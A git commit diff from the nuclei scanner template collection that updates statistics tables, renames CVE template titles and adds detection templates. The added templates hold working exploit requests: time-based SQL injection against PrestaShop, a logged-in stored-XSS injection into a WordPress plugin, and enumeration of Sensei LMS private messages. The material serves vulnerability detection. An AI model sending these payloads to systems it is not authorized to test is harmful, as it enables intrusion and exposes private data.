commit
ad0067570a
|
@ -1,28 +0,0 @@
|
|||
cves/2012/CVE-2012-0394.yaml
|
||||
cves/2021/CVE-2021-43421.yaml
|
||||
cves/2022/CVE-2022-1883.yaml
|
||||
cves/2022/CVE-2022-1916.yaml
|
||||
cves/2022/CVE-2022-1933.yaml
|
||||
cves/2022/CVE-2022-25481.yaml
|
||||
exposed-panels/exolis-engage-panel.yaml
|
||||
exposed-panels/fastpanel-hosting-control-panel.yaml
|
||||
exposed-panels/mach-proweb-login.yaml
|
||||
exposed-panels/nuxeo-platform-panel.yaml
|
||||
exposed-panels/pega-web-panel.yaml
|
||||
exposures/logs/ffserver-status.yaml
|
||||
misconfiguration/collectd-exporter-metrics.yaml
|
||||
misconfiguration/installer/oxid-eshop-installer.yaml
|
||||
misconfiguration/libvirt-exporter-metrics.yaml
|
||||
misconfiguration/lvm-exporter-metrics.yaml
|
||||
misconfiguration/mysqld-exporter-metrics.yaml
|
||||
misconfiguration/namedprocess-exporter-metrics.yaml
|
||||
misconfiguration/postgres-exporter-metrics.yaml
|
||||
misconfiguration/rabbitmq-exporter-metrics.yaml
|
||||
misconfiguration/s3-torrent.yaml
|
||||
misconfiguration/symfony-fosjrouting-bundle.yaml
|
||||
technologies/aerocms-detect.yaml
|
||||
technologies/oracle-httpserver12c.yaml
|
||||
technologies/payara-micro-server-detect.yaml
|
||||
token-spray/api-giphy.yaml
|
||||
vulnerabilities/other/inspur-clusterengine-rce.yaml
|
||||
vulnerabilities/wordpress/wptouch-xss.yaml
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1538 | dhiyaneshdk | 692 | cves | 1516 | info | 1631 | http | 4257 |
|
||||
| panel | 755 | daffainfo | 662 | exposed-panels | 757 | high | 1141 | file | 78 |
|
||||
| edb | 578 | pikpikcu | 340 | vulnerabilities | 518 | medium | 829 | network | 73 |
|
||||
| xss | 537 | pdteam | 274 | misconfiguration | 350 | critical | 546 | dns | 17 |
|
||||
| exposure | 536 | geeknik | 197 | technologies | 311 | low | 269 | | |
|
||||
| lfi | 519 | dwisiswant0 | 171 | exposures | 301 | unknown | 25 | | |
|
||||
| wordpress | 465 | 0x_akoko | 170 | token-spray | 235 | | | | |
|
||||
| cve2021 | 366 | pussycat0x | 168 | workflows | 190 | | | | |
|
||||
| wp-plugin | 360 | ritikchaddha | 161 | default-logins | 114 | | | | |
|
||||
| tech | 349 | princechaddha | 153 | file | 78 | | | | |
|
||||
| cve | 1551 | dhiyaneshdk | 701 | cves | 1528 | info | 1666 | http | 4323 |
|
||||
| panel | 778 | daffainfo | 662 | exposed-panels | 780 | high | 1152 | file | 78 |
|
||||
| edb | 582 | pikpikcu | 344 | vulnerabilities | 519 | medium | 835 | network | 77 |
|
||||
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
|
||||
| xss | 541 | geeknik | 206 | technologies | 319 | low | 281 | | |
|
||||
| lfi | 519 | dwisiswant0 | 171 | exposures | 308 | unknown | 25 | | |
|
||||
| wordpress | 470 | pussycat0x | 171 | token-spray | 236 | | | | |
|
||||
| cve2021 | 369 | 0x_akoko | 170 | workflows | 190 | | | | |
|
||||
| wp-plugin | 365 | ritikchaddha | 163 | default-logins | 116 | | | | |
|
||||
| tech | 357 | princechaddha | 153 | file | 78 | | | | |
|
||||
|
||||
**314 directories, 4660 files**.
|
||||
**321 directories, 4733 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
File diff suppressed because one or more lines are too long
4394
TEMPLATES-STATS.md
4394
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1538 | dhiyaneshdk | 692 | cves | 1516 | info | 1631 | http | 4257 |
|
||||
| panel | 755 | daffainfo | 662 | exposed-panels | 757 | high | 1141 | file | 78 |
|
||||
| edb | 578 | pikpikcu | 340 | vulnerabilities | 518 | medium | 829 | network | 73 |
|
||||
| xss | 537 | pdteam | 274 | misconfiguration | 350 | critical | 546 | dns | 17 |
|
||||
| exposure | 536 | geeknik | 197 | technologies | 311 | low | 269 | | |
|
||||
| lfi | 519 | dwisiswant0 | 171 | exposures | 301 | unknown | 25 | | |
|
||||
| wordpress | 465 | 0x_akoko | 170 | token-spray | 235 | | | | |
|
||||
| cve2021 | 366 | pussycat0x | 168 | workflows | 190 | | | | |
|
||||
| wp-plugin | 360 | ritikchaddha | 161 | default-logins | 114 | | | | |
|
||||
| tech | 349 | princechaddha | 153 | file | 78 | | | | |
|
||||
| cve | 1551 | dhiyaneshdk | 701 | cves | 1528 | info | 1666 | http | 4323 |
|
||||
| panel | 778 | daffainfo | 662 | exposed-panels | 780 | high | 1152 | file | 78 |
|
||||
| edb | 582 | pikpikcu | 344 | vulnerabilities | 519 | medium | 835 | network | 77 |
|
||||
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
|
||||
| xss | 541 | geeknik | 206 | technologies | 319 | low | 281 | | |
|
||||
| lfi | 519 | dwisiswant0 | 171 | exposures | 308 | unknown | 25 | | |
|
||||
| wordpress | 470 | pussycat0x | 171 | token-spray | 236 | | | | |
|
||||
| cve2021 | 369 | 0x_akoko | 170 | workflows | 190 | | | | |
|
||||
| wp-plugin | 365 | ritikchaddha | 163 | default-logins | 116 | | | | |
|
||||
| tech | 357 | princechaddha | 153 | file | 78 | | | | |
|
||||
|
|
|
@ -13,10 +13,11 @@ info:
|
|||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2008-6982
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: devalcms,xss,cms,edb
|
||||
tags: cve,cve2008,devalcms,xss,cms,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
|
@ -11,6 +11,8 @@ info:
|
|||
- https://www.exploit-db.com/exploits/31434
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0394
|
||||
- http://www.exploit-db.com/exploits/18329
|
||||
classification:
|
||||
cve-id: CVE-2012-0394
|
||||
metadata:
|
||||
shodan-query: html:"Struts Problem Report"
|
||||
verified: "true"
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2016-10033
|
||||
|
||||
info:
|
||||
name: WordPress PHPMailer < 5.2.18 Remote Code Execution
|
||||
name: WordPress PHPMailer < 5.2.18 - Remote Code Execution
|
||||
author: princechaddha
|
||||
severity: critical
|
||||
description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2018-14912
|
||||
|
||||
info:
|
||||
name: cgit < 1.2.1 Directory Traversal
|
||||
name: cgit < 1.2.1 - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-10232
|
||||
|
||||
info:
|
||||
name: Teclib GLPI <= 9.3.3 Unauthenticated SQL Injection
|
||||
name: Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection
|
||||
author: RedTeamBrasil
|
||||
severity: critical
|
||||
description: Teclib GLPI <= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-12314
|
||||
|
||||
info:
|
||||
name: Deltek Maconomy 2.2.5 Local File Inclusion
|
||||
name: Deltek Maconomy 2.2.5 - Local File Inclusion
|
||||
author: madrobot
|
||||
severity: critical
|
||||
description: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-12725
|
||||
|
||||
info:
|
||||
name: Zeroshell 3.9.0 Remote Command Execution
|
||||
name: Zeroshell 3.9.0 - Remote Command Execution
|
||||
author: dwisiswant0,akincibor
|
||||
severity: critical
|
||||
description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-13101
|
||||
|
||||
info:
|
||||
name: D-Link DIR-600M Authentication Bypass
|
||||
name: D-Link DIR-600M - Authentication Bypass
|
||||
author: Suman_Kar
|
||||
severity: critical
|
||||
description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-13392
|
||||
|
||||
info:
|
||||
name: MindPalette NateMail 3.0.15 Cross-Site Scripting
|
||||
name: MindPalette NateMail 3.0.15 - Cross-Site Scripting
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: MindPalette NateMail 3.0.15 is susceptible to reflected cross-site scripting which could allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-15107
|
||||
|
||||
info:
|
||||
name: Webmin <= 1.920 Unauthenticated Remote Command Execution
|
||||
name: Webmin <= 1.920 - Unauthenticated Remote Command Execution
|
||||
author: bp0lr
|
||||
severity: critical
|
||||
description: Webmin <=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-16313
|
||||
|
||||
info:
|
||||
name: ifw8 Router ROM v4.31 Credential Discovery
|
||||
name: ifw8 Router ROM v4.31 - Credential Discovery
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: ifw8 Router ROM v4.31 is vulnerable to credential disclosure via action/usermanager.htm HTML source code.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-16662
|
||||
|
||||
info:
|
||||
name: rConfig 3.9.2 Remote Code Execution
|
||||
name: rConfig 3.9.2 - Remote Code Execution
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: rConfig 3.9.2 is susceptible to a remote code execution vulnerability. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-10546
|
||||
|
||||
info:
|
||||
name: rConfig 3.9.4 SQL Injection
|
||||
name: rConfig 3.9.4 - SQL Injection
|
||||
author: madrobot
|
||||
severity: critical
|
||||
description: rConfig 3.9.4 and previous versions have unauthenticated compliancepolicies.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement,
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-10547
|
||||
|
||||
info:
|
||||
name: rConfig 3.9.4 SQL Injection
|
||||
name: rConfig 3.9.4 - SQL Injection
|
||||
author: madrobot
|
||||
severity: critical
|
||||
description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because nodes' passwords are stored by default in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-11991
|
||||
|
||||
info:
|
||||
name: Apache Cocoon 2.1.12 XML Injection
|
||||
name: Apache Cocoon 2.1.12 - XML Injection
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-13937
|
||||
|
||||
info:
|
||||
name: Apache Kylin Exposed Configuration File
|
||||
name: Apache Kylin - Exposed Configuration File
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.
|
||||
|
|
|
@ -4,7 +4,7 @@ id: CVE-2020-25213
|
|||
# http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt
|
||||
|
||||
info:
|
||||
name: WordPress File Manager Plugin Remote Code Execution
|
||||
name: WordPress File Manager Plugin - Remote Code Execution
|
||||
author: foulenzer
|
||||
severity: critical
|
||||
description: The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-25223
|
||||
|
||||
info:
|
||||
name: Sophos UTM Preauth Remote Code Execution
|
||||
name: Sophos UTM Preauth - Remote Code Execution
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-25506
|
||||
|
||||
info:
|
||||
name: D-Link DNS-320 Unauthenticated Remote Code Execution
|
||||
name: D-Link DNS-320 - Unauthenticated Remote Code Execution
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-2551
|
||||
|
||||
info:
|
||||
name: Oracle WebLogic Server Remote Code Execution
|
||||
name: Oracle WebLogic Server - Remote Code Execution
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: |
|
||||
|
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2020-26248
|
||||
|
||||
info:
|
||||
name: PrestaShop ProductComments < 4.2.0 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: high
|
||||
description: |
|
||||
In the PrestaShop module "productcomments" before version 4.2.1, an attacker can use a Blind SQL injection to retrieve data or stop the MySQL service. The problem is fixed in 4.2.1 of the module.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-26248
|
||||
- https://packagist.org/packages/prestashop/productcomments
|
||||
- https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
|
||||
cvss-score: 8.2
|
||||
cve-id: CVE-2020-26248
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2020,sqli,prestshop,packetstorm
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 20s
|
||||
GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "average_grade")'
|
||||
condition: and
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-35846
|
||||
|
||||
info:
|
||||
name: Agentejo Cockpit < 0.11.2 NoSQL Injection
|
||||
name: Agentejo Cockpit < 0.11.2 - NoSQL Injection
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-35847
|
||||
|
||||
info:
|
||||
name: Agentejo Cockpit <0.11.2 NoSQL Injection
|
||||
name: Agentejo Cockpit <0.11.2 - NoSQL Injection
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-20114
|
||||
|
||||
info:
|
||||
name: TCExam <= 14.8.1 Sensitive Information Exposure
|
||||
name: TCExam <= 14.8.1 - Sensitive Information Exposure
|
||||
author: push4d
|
||||
severity: high
|
||||
description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files.
|
||||
|
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2021-3110
|
||||
|
||||
info:
|
||||
name: PrestaShop 1.7.7.0 SQL Injection
|
||||
author: Jaimin Gondaliya
|
||||
severity: critical
|
||||
description: |
|
||||
The store system in PrestaShop 1.7.7.0 allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3110
|
||||
- https://medium.com/@gondaliyajaimin797/cve-2021-3110-75a24943ca5e
|
||||
- https://www.exploit-db.com/exploits/49410
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-3110
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2021,sqli,prestshop,edb
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 20s
|
||||
GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "average_grade")'
|
||||
condition: and
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-31682
|
||||
|
||||
info:
|
||||
name: WebCTRL OEM <= 6.5 Cross-Site Scripting
|
||||
name: WebCTRL OEM <= 6.5 - Cross-Site Scripting
|
||||
author: gy741,dhiyaneshDk
|
||||
severity: medium
|
||||
description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter.
|
||||
|
|
|
@ -16,8 +16,10 @@ info:
|
|||
cve-id: CVE-2021-35587
|
||||
cwe-id: CWE-502
|
||||
metadata:
|
||||
verified: true
|
||||
fofa-query: body="/oam/pages/css/login_page.css"
|
||||
tags: cve,cve2021,oam,rce,java,unauth,oracle
|
||||
shodan-query: http.title:"Oracle Access Management"
|
||||
tags: cve,cve2021,oam,rce,java,unauth,oracle,kev
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-38751
|
||||
|
||||
info:
|
||||
name: ExponentCMS <= 2.6 Host Header Injection
|
||||
name: ExponentCMS <= 2.6 - Host Header Injection
|
||||
author: dwisiswant0
|
||||
severity: medium
|
||||
description: An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-40438
|
||||
|
||||
info:
|
||||
name: Apache <= 2.4.48 Mod_Proxy SSRF
|
||||
name: Apache <= 2.4.48 - Mod_Proxy SSRF
|
||||
author: pdteam
|
||||
severity: critical
|
||||
description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-41174
|
||||
|
||||
info:
|
||||
name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering Cross-Site Scripting
|
||||
name: Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting
|
||||
author: pdteam
|
||||
severity: medium
|
||||
description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.
|
||||
|
|
|
@ -9,10 +9,14 @@ info:
|
|||
reference:
|
||||
- https://github.com/Studio-42/elFinder/issues/3429
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-43421
|
||||
- https://twitter.com/infosec_90/status/1455180286354919425
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-43421
|
||||
cwe-id: CWE-434
|
||||
metadata:
|
||||
verified: true
|
||||
verified: "true"
|
||||
tags: cve,cve2021,elfinder,upload,rce,intrusive
|
||||
|
||||
requests:
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-43778
|
||||
|
||||
info:
|
||||
name: GLPI plugin Barcode < 2.6.1 Path Traversal Vulnerability.
|
||||
name: GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.
|
||||
author: cckuailong
|
||||
severity: high
|
||||
description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-45232
|
||||
|
||||
info:
|
||||
name: Apache APISIX Dashboard <2.10.1 API Unauthorized Access
|
||||
name: Apache APISIX Dashboard <2.10.1 - API Unauthorized Access
|
||||
author: Mr-xn
|
||||
severity: critical
|
||||
description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication.
|
||||
|
|
|
@ -0,0 +1,48 @@
|
|||
id: CVE-2022-2034
|
||||
|
||||
info:
|
||||
name: Sensei LMS < 4.5.0 - Unauthenticated Private Messages Disclosure
|
||||
author: imhunterand
|
||||
severity: medium
|
||||
description: |
|
||||
The Sensei LMS WordPress plugin before 4.5.0 does not have proper permissions set in one of its REST endpoint, allowing unauthenticated users to access private messages sent to teachers
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/aba3dd58-7a8e-4129-add5-4dd5972c0426
|
||||
- https://hackerone.com/reports/1590237
|
||||
- https://wordpress.org/plugins/sensei-lms/advanced/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-2034
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2022-2034
|
||||
cwe-id: CWE-862
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: wp,disclosure,wpscan,cve,cve2022,sensei-lms,fuzz,hackerone,wordpress,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-json/wp/v2/sensei-messages/{{num}}"
|
||||
|
||||
payloads:
|
||||
num: helpers/wordlists/numbers.txt
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'sensei_message'
|
||||
- 'guid":{"rendered":'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- application/json
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -2,7 +2,7 @@ id: CVE-2022-23131
|
|||
|
||||
info:
|
||||
name: Zabbix - SAML SSO Authentication Bypass
|
||||
author: For3stCo1d
|
||||
author: For3stCo1d,spac3wh1te
|
||||
severity: critical
|
||||
description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified.
|
||||
reference:
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2022-25323
|
||||
|
||||
info:
|
||||
name: ZEROF Web Server 2.0 Cross-Site Scripting
|
||||
name: ZEROF Web Server 2.0 - Cross-Site Scripting
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting.
|
||||
|
|
|
@ -0,0 +1,64 @@
|
|||
id: CVE-2022-3506
|
||||
|
||||
info:
|
||||
name: WordPress Related Posts <= 2.1.2 - Cross-Site Scripting
|
||||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
The Related Posts for WordPress plugin is vulnerable to stored XSS, specifically in the rp4wp[heading_text] parameter because the user input is not properly sanitized, allowing the insertion of JavaScript code that can exploit the vulnerability.
|
||||
reference:
|
||||
- https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828/
|
||||
- https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828
|
||||
- https://github.com/barrykooij/related-posts-for-wp/commit/37733398dd88863fc0bdb3d6d378598429fd0b81
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2022-3506
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: wordpress,wp,wp-plugin,relatedposts,cve,cve2022,xss,authenticated,huntr
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||
|
||||
- |
|
||||
GET /wp-admin/options-general.php?page=rp4wp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /wp-admin/options.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
option_page=rp4wp&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=3&rp4wp%5Bheading_text%5D=%22+autofocus+onfocus%3Dalert%28document.domain%29%3E&rp4wp%5Bexcerpt_length%5D=15&rp4wp%5Bcss%5D=.rp4wp-related-posts+ul%7Bwidth%3A100%25%3Bpadding%3A0%3Bmargin%3A0%3Bfloat%3Aleft%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%7Blist-style%3Anone%3Bpadding%3A0%3Bmargin%3A0%3Bpadding-bottom%3A20px%3Bclear%3Aboth%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%3Ep%7Bmargin%3A0%3Bpadding%3A0%3B%7D%0D%0A.rp4wp-related-post-image%7Bwidth%3A35%25%3Bpadding-right%3A25px%3B-moz-box-sizing%3Aborder-box%3B-webkit-box-sizing%3Aborder-box%3Bbox-sizing%3Aborder-box%3Bfloat%3Aleft%3B%7D
|
||||
|
||||
- |
|
||||
GET /wp-admin/options-general.php?page=rp4wp&settings-updated=true HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "contains(all_headers_4, 'text/html')"
|
||||
- "status_code_4 == 200"
|
||||
- 'contains(body_4, "value=\"\" autofocus onfocus=alert(document.domain)>")'
|
||||
- "contains(body_4, 'The amount of automatically')"
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: nonce
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- 'name="_wpnonce" value="([0-9a-z]+)" />'
|
||||
internal: true
|
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2022-45933
|
||||
|
||||
info:
|
||||
name: KubeView - Information disclosure
|
||||
author: For3stCo1d
|
||||
severity: critical
|
||||
description: |
|
||||
